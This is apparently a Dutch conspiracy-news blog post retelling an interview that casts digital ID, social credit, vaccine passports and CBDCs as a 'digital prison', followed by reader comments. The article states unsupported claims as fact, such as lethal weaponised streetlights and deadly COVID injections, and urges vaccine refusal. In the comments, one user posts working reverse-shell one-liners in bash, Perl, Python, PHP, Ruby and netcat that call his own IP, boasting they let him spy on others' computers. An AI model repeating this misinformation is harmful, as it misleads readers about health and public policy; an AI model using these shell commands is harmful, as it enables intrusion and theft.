In de video hieronder interviewt Maria Zeee van ZeeeMedia computerwetenschapper Aman Jabbi over het komende internationale vaccinpaspoort, digitale identiteit, het sociale kredietsysteem dat in het Westen wordt gebouwd, en de digitale munt van de centrale bank (CBDC), meldt Dr Mercola.

Al deze factoren komen nu samen om de wereldbevolking te controleren. Zoals Zeee opmerkt, zal deze digitale gevangenis, die al grotendeels is gebouwd, de definitieve lockdown van de mensheid zijn.

Uw digitale identiteit wordt uw digitale gevangenis

In de video neemt Jabbi een presentatie door die de digitale gevangenis uitlegt die uw digitale identiteit is – met andere woorden, hoe uw digitale identiteit verbonden is met het komende sociale kredietsysteem en zal bepalen wat u wel en niet kunt doen in uw dagelijks leven.

Zoals Jabbi opmerkt, zijn er over de hele wereld al bewakingscamera’s met gezichtsherkenningssoftware geplaatst. Zij vormen een essentieel onderdeel van de controlestructuur, en dit toezicht zal worden gekoppeld aan digitale identiteit, het sociale kredietscore-systeem, het bijhouden van de koolstofvoetafdruk, CBDC’s en meer.

Gezichtsherkenning is verkocht als een groot gemak en beveiliging. Met gezichtsherkenning hoef je geen pins of wachtwoorden te onthouden, en aangezien niemand je exacte gezicht heeft, zou het je persoonlijke accounts veiliger maken.

Maar zoals de meeste andere technologieën die onder het mom van gemak en veiligheid worden verkocht, is gezichtsherkenning uiteindelijk een instrument voor massacontrole en een essentieel onderdeel van je individuele digitale gevangenis. Zoals Jabbi uitlegt, is het controlesysteem gebaseerd op gezichtsherkenning in combinatie met een sociaal kredietsysteem.

Hij beschrijft het sociale kredietsysteem als een feedbacksysteem dat reageert op basis van je gedrag. De meeste Westerlingen weten niet dat een identiek systeem al achter de schermen in gang is gezet in Westerse landen – ze hebben het je alleen nog niet verteld.

Italië start proefproject met sociaal kredietsysteem

Gewapende bewaking

Tegen eind 2022 zullen er wereldwijd 1 miljard bewakingscamera’s zijn die gegevens verzamelen en allemaal verbonden zijn met het internet en kunstmatige intelligentie (AI). De Verenigde Staten hebben de meeste bewakingscamera’s per hoofd van de bevolking. China staat op de tweede plaats en het Verenigd Koninkrijk op de derde.

Naast al die gegevensverzameling verzamelen en delen camera’s en geluidsopnameapparatuur in mobiele telefoons, auto’s en slimme apparaten ook gegevens, zelfs wanneer je thuis bent.

Al deze gegevens worden vervolgens gebruikt om elke persoon een individuele score te geven op basis van zijn gedrag, uitdrukking en interactie met de wereld. Uiteindelijk zal die score – je sociale kredietscore – dicteren wat je wel en niet mag doen, wat je mag kopen en waar je naartoe mag.

Zoals Jabbi opmerkt, zijn er ook al extra controlemechanismen ingebouwd in de hardware die wordt neergezet. Veel slimme lichtmasten hebben bijvoorbeeld ingebouwde oplaadstations voor drones, die in de toekomst zullen worden gebruikt voor wets- en gedragshandhaving. We zullen grotendeels worden gecontroleerd door AI en machines.

Deze slimme lichtmasten kunnen ook bewapend worden. Ingebouwd zijn LED incapacitators. LED incapacitators, die soms “kotsstralen” worden genoemd vanwege hun vermogen om ernstige misselijkheid te veroorzaken, zijn wapens ontworpen als een zaklamp die een extreem heldere, snelle en goed gerichte reeks “verschillend gekleurde willekeurige pulsen” uitzenden. Volgens Jabbi kunnen deze lichten ook hersenschade, schade aan de ruggengraat, ziekte en waarschijnlijk zelfs de dood veroorzaken.

LED in combinatie met radar op sommige slimme palen kan ook worden gebruikt om mensen met wapens te identificeren, en zou theoretisch kunnen worden gebruikt als wapen om selectief mensen met wapens uit te schakelen.

Een nieuw hoofdstuk in het “sociaal contract”

Digitale identiteit is door het Wereld Economisch Forum (WEF) beschreven als een nieuw hoofdstuk in het sociaal contract. Het probleem, zoals opgemerkt door Jabbi, is dat het nieuwe sociale contract van het WEF er een is waarmee niemand van ons heeft ingestemd. Het wordt herzien door het WEF en zijn bondgenoten en opgedrongen aan de rest van ons, zonder onze instemming.

De overgrote meerderheid van de mensen weet niet eens wat dit nieuwe sociale contract eigenlijk inhoudt, of hoe het hun persoonlijke dagelijkse leven en individuele beslissingsvermogen zal beïnvloeden. Dat is, om voor de hand liggende redenen, nooit volledig afgebakend omdat, als iedereen het volledig zou begrijpen, vrijwel niemand op aarde het zou accepteren. Immers, weinig mensen met een normale intelligentie vinden het prettig dat hun leven door iemand anders wordt gedicteerd.

digital identity

Zoon van Klaus Schwab in 2018: Vaccinatie als voorloper van digitale controle

Zoals uit de bovenstaande grafiek blijkt, zal uw digitale identiteit nodig zijn om alle aspecten van het leven te ontsluiten, van inloggen op internet tot toegang tot sociale diensten, reizen, eten, winkelen en financiële diensten. Als je sociale kredietscore te laag is, kunnen een of meer van deze aspecten worden uitgeschakeld en onbeschikbaar voor je worden gemaakt. “Dus standaard ben je altijd een gevangene”, zegt Jabbi.

Je digitale identiteit wordt bevestigd via gezichtsherkenning en is gekoppeld aan je sociale score, CO2-voetafdrukscore en CBDC’s. Naarmate je sociale en ecologische voetafdrukscores dalen, daalt ook je koopkracht.

Zoals Zeee opmerkt, is het internationale vaccinpaspoort dat tijdens de G20-bijeenkomst van 2022 is voorgesteld, althans op dit moment, DE sleutel tot de hele inspanning om iedereen in het digitale ID-systeem te krijgen. Het verhinderen van de invoering van vaccinpaspoorten is dus een centraal onderdeel van het verzet tegen het digitale gevangenissysteem in zijn geheel.

G20-leiders verplichten alsnog wereldwijde vaccinatiepaspoorten

Zodra we digitale identiteit accepteren, is het Game Over voor de mensheid. ~ Aman Jabbi

Je moet ook het vaccinpaspoort afwijzen, tenzij je bereid bent de rest van je leven een medische labrat te zijn. Zeee haalt documenten aan waarin staat dat er tegen 2030 500 nieuwe vaccins klaar zullen zijn die gericht zijn tegen de meest voorkomende ziekten. Het is waarschijnlijk dat het hebben van een up-to-date vaccinatiestatus een van de vereisten zal zijn om een geldig paspoort te behouden, dat ook zal dienen als je digitale identiteit.

Met andere woorden, een weigering van een vaccin kan worden gebruikt om je digitale identiteit teniet te doen of te “vergrendelen”, zodat je niets meer kunt doen, gaan of kopen. De vraag is, wat zullen die vaccins zijn? In principe heb je geen andere keuze dan te voldoen, zelfs als je gelooft of weet dat een vaccin je kan verwonden of doden, zoals het geval is met de COVID injecties.

Nul vertrouwen systeem

Zoals Jabbi uitlegt, is het nieuwe sociale contract dat door het WEF en zijn bondgenoten is gecreëerd, een zero-trust systeem. In een fysieke gevangenis geldt voor gevangenen een zero-trust beleid. Met andere woorden, de bewakers vertrouwen de gevangenen niet en er zijn veiligheidsmaatregelen om ervoor te zorgen dat ze zich gedragen. Het nieuwe openluchtgevangenissysteem dat het WEF voor ogen heeft, is gebaseerd op hetzelfde uitgangspunt.

Overal waar je komt, moet je bewijzen wie je bent en dat je je aan de geldende regels houdt. Om voedsel te kopen, moet je je dus niet alleen identificeren, zodat je aankoop permanent wordt geregistreerd als een van je aankopen, maar je moet ook voldoen aan bepaalde nalevingsnormen, anders werkt je CBDC niet.

De standaard in dit systeem is ontkenning, dus alles wat je wilt doen – absoluut alles – moet worden ontgrendeld door je digitale ID. Zoals Jabbi opmerkt: “Zodra we digitale identiteit accepteren, is het Game Over voor de mensheid.”

WEF verwijdert video waarin ze aankondigden dat ze je gaan opsluiten in Smart City Concentratiekampen

Geofencing en Smart Cities vormen de muren van je gevangenis

Om uw voorwaardelijke toegang tot het leven af te dwingen, wordt geofencing gebruikt. Slimme lichtmasten uitgerust met LED incapacitators kunnen worden gebruikt om te voorkomen dat u buiten uw aangewezen geofence komt, maar er zijn ook andere geofencing mechanismen. Uw CBDC kan bijvoorbeeld worden geprogrammeerd om niet buiten uw district te werken, en uw slimme auto kan worden geprogrammeerd om voorbij een bepaalde perimeter uit te schakelen. Jabbi bekijkt ook de onverbiddelijke drang naar slimme steden, die:

  • Uw mobiliteit beperken en autobezit elimineren.
  • U controleren door bewapende surveillance.
  • Water, elektriciteit en gasverbruik rantsoeneren.
  • Uw spraak in de gaten houden.
  • Uw acties en verblijfplaats 24/7 volgen.

Het beest uithongeren

Jabbi haalt een formule aan die is bedacht door de filosofische goeroe Yuval Noah Harrari van het WEF, om het steeds toenemende vermogen van technocraten om mensen te hacken te beschrijven: B x C x D = AHH

B staat voor biologische kennis, C is rekenkracht, D is data en AHH is het niveau van het vermogen om een mens te hacken. Zoals opgemerkt door Jabbi, is het vermogen om mensen te hacken afhankelijk van een constante datastroom.

Het is een “beest-systeem” in de zin dat AI het beest is, en het moet worden gevoed. Zijn voedsel zijn gegevens, verzameld via een groot aantal gegevenskanalen zoals camera’s, opnameapparatuur, gezichtsherkenning, GPS en allerlei sensoren die samen het internet van lichamen vormen. Je kunt hier meer over lezen in “Gefabriceerde dystopie – Globalisten zullen niet stoppen met het hacken van mensen“.

AI is een absoluut cruciaal onderdeel voor het succes van de digitale gevangenis. Zonder dat, kan het niet werken. Het antwoord is om het beest uit te hongeren, en dat doen we door onze gegevens achter te houden. “Geen enkele hoeveelheid wetgeving kan dit tegenhouden,” zegt hij, “het moet door de mensen gedaan worden.” Kortom, we moeten weigeren de technologieën te gebruiken die onze gegevens verzamelen.

We zullen ze niet allemaal kunnen vermijden. Slimme lichtmasten en verkeerscamera’s, bijvoorbeeld, kunnen niet worden vermeden, tenzij je bepaalde gebieden vermijdt, waaronder je eigen straat. Maar er zijn er veel die we kunnen vermijden, zoals slimme horloges, fitnesstrackers, slimme thermostaten, slimme tv’s, AI-assistenten en Ringbewakingscamera’s, om er maar een paar te noemen.

We kunnen ook, op lokaal niveau, vechten tegen de uitbreiding van gezichtsherkenningscamera’s en 5G, en we kunnen het komende vaccinpaspoort en de push naar virtual reality weigeren. Zoals opgemerkt door Jabbi, is één manier waarop mensen heimelijk de digitale gevangenis in worden geleid, door te vertrouwen op apps die gemak bieden, zoals apps waarmee je eten of vervoer kunt bestellen.

{…}


Help ons de censuur van BIG-TECH te omzeilen en volg ons op Telegram:

Telegram: t.me/dissidenteen

Meld je aan voor onze gratis dagelijkse nieuwsbrief, 10.000 gingen je al voor:


Smart Cities’ worden wereldwijd omgevormd tot ‘open concentratiekampen’, zegt ex-Silicon Valley ingenieur die klokkenluider is geworden

4.5 2 stemmen
Artikelbeoordeling
Abonneer
Laat het weten als er
guest

7 Reacties
Inline feedbacks
Bekijk alle reacties
Dee
Dee
1 maand geleden

Daarom wijs ik iedereen er al jaren op zo weinig mogelijk digitale sporen achter te laten omdat al die data eens tegen ons gebruikt gaat worden. Maar ja, het gros van de mensen had/heeft geen interesse. Gemak dient immers de mens toch? Nu dreigt dat gemak heel ongemakkelijk te worden en in potentie zelfs dodelijk.
Koop zoveel als mogelijk fysiek en niet online. Betaal zoveel mogelijk cash. Verplaats jezelf zo lang het nog kan in een auto op brandstof. Ik zet altijd een pet op en doe de zonneklep omlaag als ik ga rijden. Ook op plekken waar zich camera’s bevinden draag ik een pet met grote klep of een hoed. Bescherm jezelf online. Verander het default wachtwoord in je router en zet WEP uit want die is gemakkelijk te kraken. Gebruik een vpn en nog liever Tor in combinatie met een vpn. Installeer HTTPS everywhere in je browser, dan gaat al jou internet verkeer over HTTPS en is dan nogmaals versleuteld. Installeer Privacy Badger in jou brouwser zodat bedrijven en instellingen je niet kunnen tracken. Installeer WebRTC in jou browser zodat via deze methode jou ip adres niet te achterhalen is. Schakel WebGL uit in jou browser. In Firefox doe je dat door about:config te typen in de zoekbalk. Accepteer het risico, klik enter, en dan type je WebGL in de zoekbalk. Scroll naar beneden tot je WebGL vind en zet die dan op False. WebRTC kun je op deze pagina ook uitzetten door WebRTC in de zoekbalk te typen en WebRTC op False te zetten. Dan, in instellingen, General, scroll naar beneden naar Network Settings, klik op Settings. Dan helemaal onderaan vink je Enable DNS over HTTPS aan. De provider kun je op Cloudflare houden. Dan, in instellingen, Privacy & Security zet je de bescherming op Strict. Iets daaronder kun je ‘Sen web sites a “Do Not Track” signal op Always zetten. En nog iets daaronder kun je ‘Always use private browsing mode’ aanvinken. Helemaal beneden vink je ‘Enable HTTPS-Only Mode in all windows’ aan.
Verder, ga weg van Google Search. De beste zoek machine vind ik op dit moment Brave Search. Je kunt die vinden en instellen in Intellingen, Search, klik op ‘Find more search engines’ en type daar Brave Search aan. Die kun je daar dan toevoegen. Verder is het verstandig om te wennen een Private Window te kiezen in plaats van gewoon je browser aan te zetten. Dat doe je door reckts op het icoontje te klikken en dan ‘Open a private window’ te kiezen.
Istalleer een vpn op je mobiel. Nog beter is hette kiezen voor een Linux telefoon. Pine phone is goed en heel betaalbaar en respecteerd jouw privacy. Maar ook daar moet een vpn op. Op Android telefoons kun je Bitmask installeren en daat een gratis vpn installeren. Maar ik vind Protonvpn erg goed. Proton bied ook een mailservice die versleuteld is. Met een Proton mail account kun je dan inloggen op jou Protonvpn. Verder vind ik Tutanota en Mailfence goede mail services die ook versleuteling bieden tegen ongewenste meekijkers.
En laat je mobiel zoveel mogelijk thuis als je die niet nodig hebt. Blijf weg van social media.
Wees zo onzichtbaar mogelijk. Voedt hun datahonger niet. Maak het hen zo moelijk als mogelijk.
Het kost Big Tech en veiligheidsdiensten ongeveer 20 cent om een normaal persoon die zich niet beschermt te volgen en af te luisteren. Bescherm jij jezelf, dan lopen de kosten al snel op te $100.000 per persoon.
Ik hoop dat jullie hier iets aan hebben. Doe mee met het verzet en jaag hen op kosten. Want daar doet het hen het meeste pijn!

(En als je kan, ga weg van microsoft! en Mac is ook niet te vertrouwen. Probeer eens Linux! Gratis en voor niks. Ubuntu en Linux Mint zijn erg gebruikers vriendelijk!)

Hagar
Hagar
1 maand geleden
Antwoord aan  Dee

Goede tips!

Dee
Dee
1 maand geleden
Antwoord aan  Dee
Dee
Dee
1 maand geleden
Antwoord aan  Dee

Deze commando’s zijn in verschillende progamma talen geschreven.
Als ik een van deze codes weet te executeren op een andermans computer, dan kan ik alle verkeer afluisteren. Dus internetbezoek, wachtwoorden, emails lezen, alles wat je typed en nog veel meer.
Zo simpel kan het zijn en zo gevaarlijk is het! En dan ben ik nog maar een kleine hobby hacker met een simpel laptopje.

Basis commando:
nc -vv -l -p 8080

Andere progamma talen:

BASH
bash -i >& /dev/tcp/10.0.2.15/8080 0>&1

PERL
perl -e ‘use Socket;$i=”10.0.2″;$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

Python
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.2”,8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

PHP
php -r ‘$sock=fsockopen(“10.0.2”,8080);exec(“/bin/sh -i &3 2>&3”);’

Ruby
ruby -rsocket -e’f=TCPSocket.open(“10.20.14”,8080).to_i;exec sprintf(“/bin/sh -i &%d 2>&%d”,f,f,f)’

Netcat
nc -e /bin/sh 10.0.2.15 8080

(mijn ip adres is hier 10.0.2.15, en de poort waarop ik luister is poort 8080. Deze codes connecten dus jou apparaat met mijn computer)

Laatst bewerkt op 1 maand geleden door Dee
Hagar
Hagar
1 maand geleden

Technologie op zich is niet het gevaar. Technologie kan ten goede en ten kwade worden aangewend.

Het probleem is dat we geregeerd worden door Bolsjewistische tirannen, die streven naar totale werelddominantie, en die alle mogelijke technologie, van het wiel tot de computerchip; aanwenden om hun macht te vergroten.

Zolang deze Bolsjewisten aan de macht zijn, zullen zij ons terroriseren, met computertechnologie, of zoals in WO1; WO2; of nu met de Oekieoorlog: door ons elkaar laten uitmoorden in zinloze oorlogen.

Dee
Dee
1 maand geleden
Antwoord aan  Hagar

Ja, ik kan een schroevendraaier gebruiken om schroefjes los of vast te draaien, maar ook om iemand lek te prikken.

Digital Overlord
Digital Overlord
1 maand geleden
Antwoord aan  Dee

Alles wat niet muur- en muurvast zit kun je als wapen gebruiken. Een donzen veertje. Een balpen. Tafelzout. Een knuffelbeer.

Ze zijn niet allemaal even effectief. Als je creatief bent kun je ze wel effectiever maken.